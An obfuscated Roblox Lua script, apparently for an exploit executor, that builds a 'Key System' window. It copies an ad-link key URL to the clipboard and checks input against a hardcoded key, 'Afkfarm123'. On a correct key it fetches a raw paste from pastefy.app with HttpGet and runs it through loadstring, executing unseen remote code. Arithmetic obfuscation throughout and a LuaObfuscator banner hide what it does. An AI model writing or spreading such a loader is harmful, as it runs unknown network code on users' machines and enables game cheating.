local v0=Instance.new("ScreenGui");v0.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui");local v2=Instance.new("Frame");v2.Size=UDim2.new(1253 -(976 + 277) ,1357 -(892 + 65) ,0 -0 ,554 -254 );v2.Position=UDim2.new(0.5,0,0.5 -0 ,350 -(87 + 263) );v2.AnchorPoint=Vector2.new(180.5 -(67 + 113) ,0.5 + 0 );v2.BackgroundColor3=Color3.fromRGB(36 -21 ,15,15);v2.BorderSizePixel=0 + 0 ;v2.Active=true;v2.Draggable=true;v2.Parent=v0;local v11=Instance.new("UICorner");v11.CornerRadius=UDim.new(0 -0 ,10);v11.Parent=v2;local v14=Instance.new("TextButton");v14.Size=UDim2.new(0,992 -(802 + 150) ,0 -0 ,72 -32 );v14.Position=UDim2.new(1 + 0 , -40,997 -(915 + 82) ,0 -0 );v14.BackgroundTransparency=1 + 0 ;v14.Text="×";v14.TextScaled=true;v14.TextColor3=Color3.fromRGB(197 -47 ,1337 -(1069 + 118) ,340 -190 );v14.Parent=v2;v14.MouseButton1Click:Connect(function() v0:Destroy();end);local v22=Instance.new("TextLabel");v22.Size=UDim2.new(1 -0 ,0 + 0 ,0,30);v22.Position=UDim2.new(0,0,0.05,0 -0 );v22.Text="Key System";v22.TextSize=18 + 0 ;v22.TextColor3=Color3.fromRGB(1046 -(368 + 423) ,801 -546 ,273 -(10 + 8) );v22.BackgroundTransparency=1;v22.Parent=v2;local v30=Instance.new("TextLabel");v30.Size=UDim2.new(3 -2 ,442 -(416 + 26) ,0 -0 ,13 + 17 );v30.Position=UDim2.new(0 -0 ,438 -(145 + 293) ,0.2,430 -(44 + 386) );v30.Text="Enter Key To Access The Script";v30.TextSize=1499 -(998 + 488) ;v30.TextColor3=Color3.fromRGB(150,48 + 102 ,150);v30.BackgroundTransparency=1;v30.Parent=v2;local v38=Instance.new("TextBox");v38.Size=UDim2.new(0.8 + 0 ,772 -(201 + 571) ,1138.2 -(116 + 1022) ,0);v38.Position=UDim2.new(0.1 -0 ,0,0.4 + 0 ,0);v38.BackgroundColor3=Color3.fromRGB(91 -66 ,88 -63 ,884 -(814 + 45) );v38.PlaceholderText="Enter Key...";v38.Text="";v38.TextSize=44 -26 ;v38.TextColor3=Color3.fromRGB(14 + 241 ,255,91 + 164 );v38.Parent=v2;local v47=Instance.new("UICorner");v47.CornerRadius=UDim.new(885 -(261 + 624) ,8 -3 );v47.Parent=v38;local v50=Instance.new("TextButton");v50.Size=UDim2.new(1080.35 -(1020 + 60) ,1423 -(630 + 793) ,0.15,0 -0 );v50.Position=UDim2.new(0.1 -0 ,0 + 0 ,0.7 -0 ,0);v50.BackgroundColor3=Color3.fromRGB(25,1772 -(760 + 987) ,25);v50.Text="Get Key";v50.TextSize=1931 -(1789 + 124) ;v50.TextColor3=Color3.fromRGB(150,916 -(745 + 21) ,150);v50.Parent=v2;local v58=Instance.new("UICorner");v58.CornerRadius=UDim.new(0 + 0 ,5);v58.Parent=v50;local v61=Instance.new("TextButton");v61.Size=UDim2.new(0.35 -0 ,0 -0 ,0.15,0);v61.Position=UDim2.new(0.55 + 0 ,0 + 0 ,1055.7 -(87 + 968) ,0 -0 );v61.BackgroundColor3=Color3.fromRGB(23 + 2 ,56 -31 ,1438 -(447 + 966) );v61.Text="Check Key";v61.TextSize=18;v61.TextColor3=Color3.fromRGB(410 -260 ,150,150);v61.Parent=v2;local v69=Instance.new("UICorner");v69.CornerRadius=UDim.new(1817 -(1703 + 114) ,5);v69.Parent=v61;v50.MouseButton1Click:Connect(function() setclipboard("https://link-center.net/1309315/key-system");end);local function v72(v73) return v73=="Afkfarm123" ;end v61.MouseButton1Click:Connect(function() local v74=0;local v75;while true do if (v74==(701 -(376 + 325))) then v75=v38.Text;if v72(v75) then local v77=0 -0 ;local v78;while true do if (0==v77) then v78=0 -0 ;while true do if ((1 + 0)==v78) then wait(2 -1 );v0:Destroy();v78=16 -(9 + 5) ;end if (v78==(378 -(85 + 291))) then loadstring(game:HttpGet("https://pastefy.app/0l6mcBDo/raw"))();break;end if (v78==(1265 -(243 + 1022))) then v38.PlaceholderText="Correct Key!";v38.Text="";v78=1;end end break;end end else v38.PlaceholderText="Invalid key or expired key.";v38.Text="";wait(3 -2 );v38.PlaceholderText="Enter Key...";v38.Text="";end break;end end end);
-- ⚠️ WARNING: integrity protected!
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--
